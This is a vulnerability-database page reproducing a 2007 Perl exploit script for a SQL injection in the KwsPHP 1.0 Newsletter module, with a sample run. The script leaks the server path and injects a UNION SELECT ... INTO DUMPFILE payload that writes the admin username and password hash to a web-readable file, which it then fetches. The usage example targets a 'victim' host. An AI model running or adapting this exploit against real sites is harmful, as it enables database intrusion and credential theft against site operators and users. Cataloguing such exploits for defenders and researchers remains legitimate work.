Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

KwsPHP 1.0 Module Newsletter - SQL Injection

🗓️ 11 Oct 2007 00:00:00Reported by s4miType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 33 Views

KwsPHP 1.0 Newsletter Module SQL Injection vulnerability on KwsPHP 1.0 Newsletter Module script allows remote attackers to execute arbitrary SQL commands via the newsletter parameter

Code
##################################################
#	Script....................................: KwsPHP  ver 1.0 Newsletter Module
#	Script Site...........................: http://www.kwsphp.org
#	Vulnerability........................: Remote SQL injection Exploit
#	Access..................................: Remote
#	level......................................: Dangerous
#	Author..................................: S4mi 
#	Contact.................................: S4mi[at]LinuxMail.org 
##################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 .....
#
##################################################
#This Exploit Only When magic_quotes_gpc Is OFF
#Vuln Files:
#\modules\newsletter\index.php
#               [code]
#
# line: 94	$req = reqmysql('SELECT pseudo,email FROM users WHERE email="'.$newsletter.'"') ;
# line: 95	$rep1 = mysql_fetch_object($req) ;
#                
#                  [/code]
#
#**************************************************************************

#Screen shot
#----------------
#C:\>KwsPHP.pl 127.0.0.1 /KwsPHP/

# Connecting .....[OK]
# Sending Data ...[OK]

#+ Getting the Full path.
#+ ---------------- +
#+ path: c:\public_html\kwsphp\

# Connecting .....[OK]
# Sending Data ...[OK]

#+ Getting the injected code.
#+ ---------------- +
#127.0.0.1/KwsPHP//index.php?mod=newsletter&avert_news=1&newsletter="union all select pseudo,concat(CHAR(58),CHAR(58),pass,CHAR(44)) from users where id=1 INTO DUMPFILE 'c:/public_html/kwsphp/images/l3eez.gif'/*
#+ ---------------- +

#+ injecting database.
#+ ---------------- +
#+ Done!

# Connecting .....[OK]
# Sending Data ...[OK]

#+ Getting user info.
#+ ---------------- +
#+ username: admin1
#+ Password: e10adc3949ba59abbe56e057f20f883e

#C:\>

###################################################

#!/usr/bin/perl

use IO::Socket ;

&header();

&usage unless(defined($ARGV[0] && $ARGV[1] ));

$host = $ARGV[0];
$path = $ARGV[1];

#print "User Name: ";
#$user = <STDIN>;
#chop ($user);

syswrite STDOUT ,"\n Connecting ...";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
								
die "\n Unable to connect to $host\n" unless($sock);

syswrite STDOUT, "[OK]";

syswrite STDOUT ,"\n Sending Data ...";

print $sock "GET $path/index.php?mod=newsletter&avert_news=1&newsletter=\" HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";
syswrite STDOUT ,"[OK]\n\n";

while($answer = <$sock>){

if ($answer =~ /in <b>(.*?)\modul(.*?)92/){
print "+ Getting the Full path.\n";
print "+ ---------------- +\n";
print "+ path: $1\n";

# here we need to replace the  "\" by "/"  in the  $1 for the Windoz Servers (didn't 
$localpath = $1;
$fullpath = $localpath."images/l3eez.gif";
}

else
{
	print "\Can't find the full path\n";
	exit(0);
}
}

$inject = "union all select pseudo,concat(CHAR(58),CHAR(58),pass,CHAR(44)) from users where id=1 INTO DUMPFILE '$fullpath'/*";

syswrite STDOUT ,"\n Connecting ...";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
								
die "\n Unable to connect to $host\n" unless($sock);

syswrite STDOUT, "[OK]";

syswrite STDOUT ,"\n Sending Data ...";
print $sock "GET $path/index.php?mod=newsletter&avert_news=1&newsletter=\"$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";
syswrite STDOUT ,"[OK]\n\n";


print "+ Getting the injected code.\n";
print "+ ---------------- +\n";
print "$host$path/index.php?mod=newsletter&avert_news=1&newsletter=\"$inject \n";
print "+ ---------------- +\n\n";
print "+ injecting database.\n";
print "+ ---------------- +\n";


#here need to connect to the new created file created from the sql injection (user::password,)
syswrite STDOUT ,"\n Connecting ...";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
								
die "\n Unable to connect to $host\n" unless($sock);

syswrite STDOUT, "[OK]";

syswrite STDOUT ,"\n Sending Data ...";

print $sock "GET $path/images/l3eez.gif HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";
syswrite STDOUT ,"[OK]\n\n";


while($answer = <$sock>){

if ($answer =~ /(.*?)::(.*?),/){
print "+ Getting user info.\n";
print "+ ---------------- +\n";
print "+ username: $1\n";
print "+ Password: $2\n";
}
}

sub usage{
	print "\nUsage   : perl $0 host /path/ ";
	print "\nExemple : perl $0 www.victim.com /KwsPHP/\n";
	exit(0);
}
sub header(){
print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#	Script......................: KwsPHP  ver 1.0 Newsletter Module
#	Script Site.................: http://www.kwsphp.org
#	Vulnerability...............: Remote SQL injection Exploit
#	Access......................: Remote
#	level.......................: Dangerous
#	Author......................: S4mi 
#	Contact.....................: S4mi[at]LinuxMail.org 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}

# milw0rm.com [2007-10-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Oct 2007 00:00Current
7.4High risk
Vulners AI Score7.4
kwsphpnewsletter modulesql injectionremotedangerouss4miremote sql injection exploitvulnerabilitynewsletterexploitusersinjectionremote attackerssql commandsexploit script
33